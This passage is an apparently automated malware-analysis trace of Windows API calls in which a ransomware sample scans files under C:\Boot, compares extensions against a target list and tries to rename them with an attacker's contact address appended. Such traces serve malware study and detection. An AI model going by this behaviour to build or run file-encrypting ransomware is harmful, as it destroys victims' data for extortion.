(Heap=0x6a0000, Flags=0x0, Ptr=0x703278, Size=0x20) returned 0x6ddf70 [0155.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703278 [0155.138] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703278, Size=0x20) returned 0x6dde80 [0155.138] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.139] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.139] Wow64DisableWow64FsRedirection (in: OldValue=0x307ff50 | out: OldValue=0x307ff50*=0x0) returned 1 [0155.139] lstrlenW (lpString="kernel32.dll") returned 12 [0155.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.139] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.139] Sleep (dwMilliseconds=0x64) [0155.520] Sleep (dwMilliseconds=0x64) [0155.779] Sleep (dwMilliseconds=0x64) [0156.294] Sleep (dwMilliseconds=0x64) [0156.924] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0156.924] lstrlenW (lpString="bootvhd.dll") returned 11 [0156.924] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.924] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=99744) returned 1 [0156.924] CloseHandle (hObject=0x340) returned 1 [0156.925] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0156.925] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.271] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.271] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.271] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.271] lstrlenW (lpString=".doc") returned 4 [0157.271] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0157.271] lstrlenW (lpString=".docx") returned 5 [0157.271] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0157.272] lstrlenW (lpString=".pdf") returned 4 [0157.272] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0157.272] lstrlenW (lpString=".xls") returned 4 [0157.272] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0157.272] lstrlenW (lpString=".xlsx") returned 5 [0157.272] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0157.272] lstrlenW (lpString=".ppt") returned 4 [0157.272] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0157.272] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.272] lstrlenW (lpString=".zip") returned 4 [0157.272] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0157.272] lstrlenW (lpString=".rar") returned 4 [0157.272] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0157.272] lstrlenW (lpString=".bz2") returned 4 [0157.272] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0157.272] lstrlenW (lpString=".7z") returned 3 [0157.272] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0157.272] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.272] lstrlenW (lpString=".dbf") returned 4 [0157.273] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0157.273] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.273] lstrlenW (lpString=".1cd") returned 4 [0157.273] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0157.273] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.273] lstrlenW (lpString=".jpg") returned 4 [0157.273] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0157.273] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.273] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.273] lstrlenW (lpString=".doc") returned 4 [0157.273] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0157.273] lstrlenW (lpString=".docx") returned 5 [0157.273] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0157.273] lstrlenW (lpString=".pdf") returned 4 [0157.273] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0157.273] lstrlenW (lpString=".xls") returned 4 [0157.273] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0157.273] lstrlenW (lpString=".xlsx") returned 5 [0157.274] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0157.274] lstrlenW (lpString=".ppt") returned 4 [0157.274] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0157.274] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.274] lstrlenW (lpString=".zip") returned 4 [0157.274] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0157.274] lstrlenW (lpString=".rar") returned 4 [0157.274] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0157.274] lstrlenW (lpString=".bz2") returned 4 [0157.274] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0157.274] lstrlenW (lpString=".7z") returned 3 [0157.274] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0157.274] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.274] lstrlenW (lpString=".dbf") returned 4 [0157.274] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0157.274] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.274] lstrlenW (lpString=".1cd") returned 4 [0157.274] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0157.274] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0157.274] lstrlenW (lpString=".jpg") returned 4 [0157.274] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0157.275] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.275] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0157.275] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.277] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=1985867) returned 1 [0157.277] CloseHandle (hObject=0x3b0) returned 1 [0157.282] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0157.283] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.283] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.283] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.283] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.283] lstrlenW (lpString=".doc") returned 4 [0157.283] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.283] lstrlenW (lpString=".docx") returned 5 [0157.283] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.283] lstrlenW (lpString=".pdf") returned 4 [0157.283] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.283] lstrlenW (lpString=".xls") returned 4 [0157.283] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.283] lstrlenW (lpString=".xlsx") returned 5 [0157.283] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.283] lstrlenW (lpString=".ppt") returned 4 [0157.283] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.283] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString=".zip") returned 4 [0157.284] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.284] lstrlenW (lpString=".rar") returned 4 [0157.284] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.284] lstrlenW (lpString=".bz2") returned 4 [0157.284] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.284] lstrlenW (lpString=".7z") returned 3 [0157.284] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.284] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString=".dbf") returned 4 [0157.284] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.284] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString=".1cd") returned 4 [0157.284] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.284] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString=".jpg") returned 4 [0157.284] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.284] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.284] lstrlenW (lpString=".doc") returned 4 [0157.285] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString=".docx") returned 5 [0157.285] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.285] lstrlenW (lpString=".pdf") returned 4 [0157.285] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString=".xls") returned 4 [0157.285] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.285] lstrlenW (lpString=".xlsx") returned 5 [0157.285] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.285] lstrlenW (lpString=".ppt") returned 4 [0157.285] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.285] lstrlenW (lpString=".zip") returned 4 [0157.285] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.285] lstrlenW (lpString=".rar") returned 4 [0157.285] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString=".bz2") returned 4 [0157.285] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString=".7z") returned 3 [0157.285] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.285] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.285] lstrlenW (lpString=".dbf") returned 4 [0157.285] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.285] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.285] lstrlenW (lpString=".1cd") returned 4 [0157.285] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.286] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0157.286] lstrlenW (lpString=".jpg") returned 4 [0157.286] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.286] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.286] lstrlenW (lpString="kor_boot.ttf") returned 12 [0157.286] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.295] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=2373000) returned 1 [0157.295] CloseHandle (hObject=0x3b0) returned 1 [0157.295] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0157.295] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.295] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.295] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.296] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.296] lstrlenW (lpString=".doc") returned 4 [0157.296] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.296] lstrlenW (lpString=".docx") returned 5 [0157.296] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.296] lstrlenW (lpString=".pdf") returned 4 [0157.296] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.296] lstrlenW (lpString=".xls") returned 4 [0157.296] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.296] lstrlenW (lpString=".xlsx") returned 5 [0157.296] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.296] lstrlenW (lpString=".ppt") returned 4 [0157.296] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.296] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.296] lstrlenW (lpString=".zip") returned 4 [0157.296] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.296] lstrlenW (lpString=".rar") returned 4 [0157.296] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.296] lstrlenW (lpString=".bz2") returned 4 [0157.296] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.296] lstrlenW (lpString=".7z") returned 3 [0157.296] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.296] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.297] lstrlenW (lpString=".dbf") returned 4 [0157.297] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.297] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.297] lstrlenW (lpString=".1cd") returned 4 [0157.297] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.297] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.297] lstrlenW (lpString=".jpg") returned 4 [0157.297] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.297] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.297] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.297] lstrlenW (lpString=".doc") returned 4 [0157.297] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.297] lstrlenW (lpString=".docx") returned 5 [0157.297] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.297] lstrlenW (lpString=".pdf") returned 4 [0157.297] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.297] lstrlenW (lpString=".xls") returned 4 [0157.297] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.297] lstrlenW (lpString=".xlsx") returned 5 [0157.298] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.298] lstrlenW (lpString=".ppt") returned 4 [0157.298] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.298] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.298] lstrlenW (lpString=".zip") returned 4 [0157.298] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.298] lstrlenW (lpString=".rar") returned 4 [0157.298] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.298] lstrlenW (lpString=".bz2") returned 4 [0157.298] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.298] lstrlenW (lpString=".7z") returned 3 [0157.298] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.298] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.298] lstrlenW (lpString=".dbf") returned 4 [0157.298] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.298] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.298] lstrlenW (lpString=".1cd") returned 4 [0157.298] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.298] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0157.298] lstrlenW (lpString=".jpg") returned 4 [0157.298] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.299] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.299] lstrlenW (lpString="malgunn_boot.ttf") returned 16 [0157.299] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.301] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=174959) returned 1 [0157.301] CloseHandle (hObject=0x3b0) returned 1 [0157.301] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0157.301] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.301] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.301] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.302] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.302] lstrlenW (lpString=".doc") returned 4 [0157.302] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.302] lstrlenW (lpString=".docx") returned 5 [0157.302] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.302] lstrlenW (lpString=".pdf") returned 4 [0157.302] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.302] lstrlenW (lpString=".xls") returned 4 [0157.302] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.302] lstrlenW (lpString=".xlsx") returned 5 [0157.302] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.302] lstrlenW (lpString=".ppt") returned 4 [0157.302] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.302] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.302] lstrlenW (lpString=".zip") returned 4 [0157.302] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.302] lstrlenW (lpString=".rar") returned 4 [0157.302] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.302] lstrlenW (lpString=".bz2") returned 4 [0157.302] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.302] lstrlenW (lpString=".7z") returned 3 [0157.303] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.303] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.303] lstrlenW (lpString=".dbf") returned 4 [0157.303] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.303] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.303] lstrlenW (lpString=".1cd") returned 4 [0157.303] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.303] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.303] lstrlenW (lpString=".jpg") returned 4 [0157.303] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.303] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.303] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.303] lstrlenW (lpString=".doc") returned 4 [0157.303] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.303] lstrlenW (lpString=".docx") returned 5 [0157.303] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.303] lstrlenW (lpString=".pdf") returned 4 [0157.303] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.303] lstrlenW (lpString=".xls") returned 4 [0157.303] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.304] lstrlenW (lpString=".xlsx") returned 5 [0157.304] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.304] lstrlenW (lpString=".ppt") returned 4 [0157.304] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.304] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.304] lstrlenW (lpString=".zip") returned 4 [0157.304] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.304] lstrlenW (lpString=".rar") returned 4 [0157.304] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.304] lstrlenW (lpString=".bz2") returned 4 [0157.304] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.304] lstrlenW (lpString=".7z") returned 3 [0157.304] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.304] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.305] lstrlenW (lpString=".dbf") returned 4 [0157.305] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.305] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.305] lstrlenW (lpString=".1cd") returned 4 [0157.305] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.305] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0157.305] lstrlenW (lpString=".jpg") returned 4 [0157.305] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.305] lstrcmpiW (lpString1=".ttf", lpString2=".bat") returned 1 [0157.305] lstrlenW (lpString="malgun_boot.ttf") returned 15 [0157.305] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.307] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=177414) returned 1 [0157.307] CloseHandle (hObject=0x3b0) returned 1 [0157.307] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0157.307] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.308] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.308] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.308] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.308] lstrlenW (lpString=".doc") returned 4 [0157.308] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.308] lstrlenW (lpString=".docx") returned 5 [0157.308] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.308] lstrlenW (lpString=".pdf") returned 4 [0157.308] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.308] lstrlenW (lpString=".xls") returned 4 [0157.308] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.308] lstrlenW (lpString=".xlsx") returned 5 [0157.308] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.308] lstrlenW (lpString=".ppt") returned 4 [0157.308] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0157.308] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.308] lstrlenW (lpString=".zip") returned 4 [0157.308] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0157.308] lstrlenW (lpString=".rar") returned 4 [0157.308] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString=".bz2") returned 4 [0157.309] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString=".7z") returned 3 [0157.309] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0157.309] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.309] lstrlenW (lpString=".dbf") returned 4 [0157.309] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.309] lstrlenW (lpString=".1cd") returned 4 [0157.309] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.309] lstrlenW (lpString=".jpg") returned 4 [0157.309] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.309] lstrlenW (lpString="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 29 [0157.309] lstrlenW (lpString=".doc") returned 4 [0157.309] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString=".docx") returned 5 [0157.309] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0157.309] lstrlenW (lpString=".pdf") returned 4 [0157.309] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0157.309] lstrlenW (lpString=".xls") returned 4 [0157.309] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0157.309] lstrlenW (lpString=".xlsx") returned 5 [0157.309] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0157.309] lstrlenW (lpString=".ppt") returned 4 [0157.309] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") 